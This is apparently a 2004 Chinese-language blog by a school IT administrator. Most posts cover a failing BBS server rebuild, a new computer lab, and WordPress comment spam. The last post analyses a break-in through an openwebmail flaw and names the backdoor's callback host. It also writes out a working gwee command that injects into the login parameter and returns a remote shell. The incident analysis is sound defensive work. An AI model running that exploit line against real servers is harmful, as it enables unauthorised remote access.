2004年10月31日 星期日

BBS 的魔咒

BBS 現在已經是整台全新的機器,跟電腦教室用的一樣。

硬碟也換掉了,SCSI 卡也換掉了。最不可能壞掉的 SCSI 排線也換掉了。沒有一樣是舊的。

但還是抓不到硬碟。很傷腦筋,修電腦最怕的就是同時壞兩樣東西。全換新的之後還是有東西是壞的,那就很難檢查。

所以 BBS 復站又要再等了。

2004年10月28日 星期四

有人報名參加 BBS 維護

高一心 陳明軒 nice_cookie_2000.AT.yahoo.com.tw
高一齊 李長益 q35120.AT.yahoo.com.tw

這兩位同學,還有一位高二同學,我忘了留下姓名。大家很熱心想要參與 BBS 的維護。
不過目前比較麻煩的是,訓練的時間很長,等訓練完,應該也早就修好了吧。

所以可能要在 BBS 修復之後,才開始訓練。重點是 FreeBSD 系統的管理。

2004年10月27日 星期三

新電腦教室 A 正式啟用

從今天開始,電腦教室 A 正式啟用。

可惜第一班初二某班上完之後,清出一大堆垃圾,還有人把食物醬料灑在地板上,真令人嘆息,不知道那麼多人忙那麼久是為了什麼...

2004年10月25日 星期一

莫非定律

這真的是莫非定律。

總是殷殷勸諫他人應時常備份自己的資料,我自己卻沒有這樣做,於是今天我的硬碟死掉之後,我進正心這幾年來所有的文件及數位照片全數消失。辦公用的電腦也暫時沒辦法運作了。

既然自己的電腦不能用了,只好多花一點功夫來弄 BBS,BBS 似乎被下了惡咒,整個安裝過程中一直非常不順利,老是狀況百出。比如說,我拿了一片新的空白光碟,燒了 FreeBSD 4.10 Release 的安裝片,安裝到後來老是在某個地方失敗,看起來是硬碟 slice 分割有點問題,所以在做完 newfs 這個動作,開始把東西放進硬碟中時,就出現各種錯誤訊息。

後來才發現是安裝光碟片有問題。從七月多維修 BBS 到現在,沒有一個零件是完美無缺的運轉,不是那裡出問題就是這裡出問題。這次新電腦終於來了,從頭到腳沒有一樣不是新的,就連放著舊資料的也是之前剛換過的新硬碟。但還是裝不起來,有一兩個同學看到學校首頁我的徵求站長公告,來找我看能不能幫忙,但很可惜我知道他們幫不上忙,只好又打發他們走了,但還是非常謝謝你們!

目前系統暫時是起來了,但存放 BBS 舊資料的 SCSI 硬碟卻抓不到(應該說曾經抓到過,然後就消失了)。現在又暫時沒輒了,我最近運氣真的不太好,還是少摸點電腦好了。

2004年10月24日 星期日

WordPress 防廣告留言

今天晚上我一上這裡,就發現這個地方被塞了快一百篇的廣告留言(comment spam)。

這種廣告商很討厭,它會利用搜尋引擎自動找出安裝 WordPress 的網站,然後用機器人程式自動在網站上留言,目的是為了提高他們網站的曝光率(比如說 Google 上的排名往前移)。

反制的方法也有不少人在討論,比如說這個 Word Press Blacklist Comment Spam Plugin,或是 How to combat comment spam with WordPress

但我覺得這些方法都很麻煩,反正機器人看不懂人類的圖片,就讓留言者每次留言時,都要輸入經過「人類測試」,要看一張圖片,確定圖片中的字母,依序輸入。

其實這個方法我早在本校網站首頁上就已經在使用了,比如說這個管理者登入網址

我在這裡找到了有相同想法的人寫的程式:WordPress Hack: AuthImage,我已經把這個程式用在這個網站了,所以各位如果要留言的話,必須輸入圖片中的字母喔~

其實這個程式寫得不夠好,因為他要改不少東西,如果可以做成 plug-in,隨插即用就更好了。

產生短網址

剛剛幫本站弄了一個簡短網址:http://0rz.net/ba00f

這其實只是轉址的功能,很簡單。
你可以在這個網站:http://0rz.net,輸入一個長的網址,它就會丟一個短的網址給你。

這有什麼好處呢? 當你轉貼這些連結的時候,可以不會超出一頁的範圍,比如說在 bbs 裡面就特別好用。不用叫使用者還得自動把被斷行的網址接起來。

除了上述提供的網站,國外還有另一個提供相同功能的網站:http://tinyurl.com/

更有趣的是,竟然也有人提供把網址變長的服務:http://www.hugeurl.com/

2004年10月21日 星期四

駭客入侵事件簿1

目前大概已經整理出駭客入侵的路線了。

我一開始是看到 www 這個使用者,一直有在執行 crontab,它會不斷的去呼叫 /var/spool/uucppublic/sh。
這顯然是一個後門程式,所謂的後門就是駭客入侵之後,為了避免當時用來入侵的漏洞被修補起來,所以打開的一道後門,供日後方便進出該機器。

[[MORE]]
我使用 lsof 去觀察這個檔案,及其開啟的檔案或者網路 port,發現它會連到這個地方:
ccadam.com:6665

因為最近很忙,所以一直沒有去注意最近被發表的漏洞,只知道駭客是利用網頁的服務進來的,可是本校的網頁實在太多,到底哪一隻程式出問題,其實也不曉得。只好先隨便猜測,然後找看看有沒有對應的 advisory。還好,沒有花太多時間就鎖定了一隻有漏洞的程式:openwebmail,也就是我們的網路郵局。

根據 Hackwire上的資料,有一個不錯的 exploit 工具:Gwee,可以幫助我去驗證這個漏洞。

gwee (Generic Web Exploitation Engine) is a small program written in C designed to exploit input validation vulnerabilities in web scripts, such as Perl CGIs, PHP, etc. gwee is much like an exploit, except more general-purpose.

要入侵具有漏洞的 openwebmail 系統,只需要下這個指令:

gwee -L -y'loginname=%3B' -llocalhost -p31337 http://target/cgi-bin/openwebmail/userstat.pl


該程式會在 localhost 去 listen 31337 這個 port,然後傳回一個受害端的 shell,這個 shell 是以 www 的身份在執行的。

由於學生郵局有較嚴格的防火牆設定,所以這個工具沒辦法生效。(雖然還是有機會繞過防火牆來執行 exploit)但首頁用的主機我為了提供更高的效能,所以沒有架防火牆,因此成為目標。

現在已經將 openwebmail 都更新到最新版了。有漏洞的版本包括 OpenWebmail 2.20+ (2.20, 2.21, 2.30 confirmed) 。

駭客如果要找受害者,真的容易到了極點,不講太明了。